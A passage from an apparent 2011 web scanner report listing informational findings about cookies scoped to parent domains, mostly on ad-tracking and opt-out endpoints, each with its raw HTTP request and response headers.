Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:23:10 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=4612741554684080402; path=/; expires=Wed, 03-Oct-12 03:23:10 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|4612741554684080402|1315103146; path=/; expires=Wed, 03-Oct-12 03:23:10 GMT; path=/; domain=.mookie1.com
Location: http://uav.tidaltv.com/3PDPHandler.aspx?tpdp=25&app=3&segs=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.139. http://t4.liverail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t4.liverail.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?metric=rsync&p=1001&redirect=http%3A%2F%2Fsearch.spotxchange.com%2Fpartner%3Fadv_id%3D6498%26uid%3D17200647%26img%3DIMG HTTP/1.1
Host: t4.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
X-LR-BE: 182
Set-Cookie: lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315106486%3B%7D; expires=Thu, 20-Jan-2039 03:21:26 GMT; path=/; domain=liverail.com
X-LR-TIMESTAMP: 1315106486
X-LR-UID: 17200647
X-LR-SID: 0
X-LR-UA: Chrome/;Windows NT 6.1
Location: http://search.spotxchange.com/partner?adv_id=6498&uid=17200647&img=IMG
Content-type: text/html
Content-Length: 0
Connection: close
Date: Sun, 04 Sep 2011 03:21:26 GMT
Server: lighttpd/1.4.28


15.140. http://tags.bluekai.com/site/2688  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2688

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/2688 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oCNBJ4Q9MxhUG; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1ppA5J4Q9fzyPp; bklc=4e62e20e; bk=yK5jSuJX+9Fze1lp; bkc=KJhnjsHQZB4By1e8v1ZwiRsO/Hc/MtaOXJ1asOQmdZJAIc930RXH0k5mR6eCQ2EeI/ZYe9p7JjQRZJeTupkHIueN1wTDqQRsBQ8sCFL7WUh5xyRDwAQ2MvXshcSNe9hfEAnzOIvczSc0x2cT/w6ydisQ/KrksOQ3GmSOImFxIYeN1nTD6nNfIjQRq1fc/4iX3cyJmxRDwAQdMwIBCTcCoQyEx29SOwI9/01v4p1SF2XWkU2SOjUFt1Z9yQ4jOIBpQFyI7RWC3HEOw2i1075gxmVeSOCdBjYdKE13lfGPkxI0nhcvOyevZsp1; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62e22b; expires=Tue, 06-Sep-2011 02:27:55 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

15.141. http://tags.bluekai.com/site/353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/353

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/353?rand=0.6739487703889608 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bklc=4e62caf0; bk=ZKGU/YJX+9Fze1lp; bkc=KJh5pfXnxPWDOdeFr6kIhdjb0D/tQfvHLCQBiA73wKDdDOSkjeOjknd9H9hFoqOCKnwJFt90ZBhEflS5B8hm7d3KzIT5o/cnNXeffgx199wodOe1FjYt7xWXD6eXKHwkogp0vQbW/yjKBINusz0DP0fv3AI9GfEylRNh5yvZKKVgUcvyQnsdMfywZwnvk7pFvuPxXdgSuVTpOtSSPdTAQs5VGnlEwMz1jM4QjRUfDKOrn1O128uM2wzNT/06npwr8ouqrFJVt7V83lBrrZ4fdQsk3V5a; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oCNBJ4Q9MxhUG; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:05:45 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62eb09; expires=Tue, 06-Sep-2011 03:05:45 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=7Eoi5uJX+9Fze1lp; expires=Fri, 02-Mar-2012 03:05:45 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhnjsHQZB4By1e8v1ZwCDsB/Hc/MtaOXJ1asOQmdZJAIc930xXGOKRgopsQXWc3R4hWxxSsXhJ1eWh/dvVz3c0xKCCdYMze9hLc/Xw2AyiIgiWeYCIAcLjU9tvfVQSswD9IW8x4hGUve6UMQdEeI/K9C30URZYGQJGcT32eTTwDydCuxw4r8VBiLeA4CIepGF/k8OCxIYe21wTlcQSsZpJ1eWagWwyeMGyGd1NGdcTEPw8oaPuIR0zeYC2AcTpwY4nf59Ssoa/Wdt9pv+I+9jDwGZcXNDeI8LtG4m+VPef/FAxGcyOlpt6z; expires=Fri, 02-Mar-2012 03:05:45 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 03:05:45 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 03:05:45 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

15.142. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 04:19:38 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.rubiconproject.com/tap.php?v=5852&nid=2101&put=
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 04:19:38 GMT; Path=/
Set-Cookie: dq=2|2|0|0; Expires=Mon, 03-Sep-2012 04:19:38 GMT; Path=/
Set-Cookie: lm="4 Sep 2011 04:19:38 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


15.143. http://trk.tidaltv.com/ILogger.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.tidaltv.com
Path:   /ILogger.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ILogger.aspx?event=imp&type=5&adId=e5543049-bf4f-4504-83b8-2a8811b9f929&fmid=6759&mt=1&pid=852&rand=1149811380&mid=5164&pcid=11&pcv=75207&xf=12&g=5263&dr=1 HTTP/1.1
Host: trk.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adidt=7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ijl+fnJ2d/eKPjmdnszd1Nn1bLC+ajx597xd/9KwsLubtF/msyM5mHz369MH9h6OPXpbZNF/kyxYfHdzfG/GLHz36KL9/f//ezv7D7cn5/vn2/v2d/e2De5OD7b3s4GB3d/Lw/OHew49GH70pFvnrNlus6JXf9+7TrM23du/t3t/dubf36af0yyc79Nz5fe9+9Eu+/0v+nwAAAP//; uavpid=852; tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:25:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Set-Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be9e638884ad44aa0d1047ebf0; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:25:05 GMT; path=/
Set-Cookie: tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:25:05 GMT; path=/
Cache-Control: private
Content-Type: image/gif
Content-Length: 52

GIF89a...................!..    ....,................;.

15.144. http://uav.tidaltv.com/3PDPHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uav.tidaltv.com
Path:   /3PDPHandler.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3PDPHandler.aspx?tpdp=25&app=3&segs= HTTP/1.1
Host: uav.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; adidt=7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ijl+fnJ2d/eKPjmdnszd1Nn1bLC+ajx597xd/9KwsLubtF/msyM5mHz369MH9h6OPXpbZNF/kyxYfHdzfG/GLHz36KL9/f//ezv7D7cn5/vn2/v2d/e2De5OD7b3s4GB3d/Lw/OHew49GH70pFvnrNlus6JXf9+7TrM23du/t3t/dubf36af0yyc79Nz5fe9+9Eu+/0v+nwAAAP//; uavpid=852

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 03:23:21 GMT
Location: http://tags.bluekai.com/site/2688
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Server: Microsoft-IIS/6.0
Set-Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:23:21 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 277
Connection: keep-alive

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://tags.bluekai.com/site/2688">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tra
...[SNIP]...

15.145. http://www.adadvisor.net/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adadvisor.net
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=0.5190331 HTTP/1.1
Host: www.adadvisor.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AR2FJHgNFRQ4Qt9W2tXVkxDaOpLVexjtt

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:23:42 GMT
Server: Apache
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Set-Cookie: ab=opt-out; Domain=.adadvisor.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: aa=opt-out; Domain=.adadvisor.net; Expires=Wed, 01-Sep-2021 11:23:42 GMT; Path=/
Location: http://www.adadvisor.net/nai/verify
Content-Length: 0
Connection: close
Content-Type: text/plain


15.146. http://www.adbrite.com/mb/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mb/nai_optout.php?nocache=0.5932995 HTTP/1.1
Host: www.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e62cac8@cdn.turn.com; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; srh="1%3Aq64FAA%3D%3D"

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 11:13:43 GMT
Location: http://www.adbrite.com/mb/nai_optout.php?set=yes
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache
Set-Cookie: ut=deleted; expires=Sat, 04-Sep-2010 11:13:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: b=deleted; expires=Sat, 04-Sep-2010 11:13:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: untarget=1; expires=Wed, 01-Sep-2021 11:13:43 GMT; path=/; domain=adbrite.com
Content-Length: 0


15.147. http://www.addthis.com/api/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/nai/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:13:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: uid=0000000000000000; expires=Wed, 01-Sep-2021 11:13:09 GMT; path=/; domain=.addthis.com
Set-Cookie: di=deleted; expires=Sat, 04-Sep-2010 11:13:08 GMT; path=/; domain=.addthis.com
Set-Cookie: psc=deleted; expires=Sat, 04-Sep-2010 11:13:08 GMT; path=/; domain=.addthis.com
Location: /api/nai/optout-verify
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.148. http://www.bangkokpost.com/classified/ucp.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /classified/ucp.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /classified/ucp.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:25:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_classified_u=1; expires=Mon, 03-Sep-2012 04:25:37 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_k=; expires=Mon, 03-Sep-2012 04:25:37 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_sid=604757fbd3e5f29cf97e8709f07b988f; expires=Mon, 03-Sep-2012 04:25:37 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Location: http://member.bangkokpost.com/login.php?serviceID=10006
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


15.149. http://www.bangkokpost.com/classified/viewforum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /classified/viewforum.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /classified/viewforum.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_classified_u=1; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_k=; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_classified_sid=0022f913f5b11b1d9c1e205c086f2d6d; expires=Mon, 03-Sep-2012 04:25:36 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...

15.150. http://www.bangkokpost.com/forum/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/search.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forum/search.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=4b7e42997a4826550f71c3f558e7505f; expires=Mon, 03-Sep-2012 04:24:32 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...

15.151. http://www.bizographics.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout?nocache=0.1024612 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zw3KxG53nCJRNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQZ00UippMVQ8aj5XcunNcMDa7Re6IGD4lD0jX1iszwmcsAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspBnTRT6kxVDxqPldy6c1wwH4DELwm2ipwNADM4BS8geHXTbwiiAhQOisLS4E2RisHxH5APyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 11:13:56 GMT
Location: http://www.bizographics.com/nai/checkoptout
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 02-Sep-2016 11:13:56 GMT; Path=/
Content-Length: 0
Connection: keep-alive


15.152. http://www.burstnet.com/cgi-bin/opt_out.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/opt_out.cgi?nocache=0.5978476 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
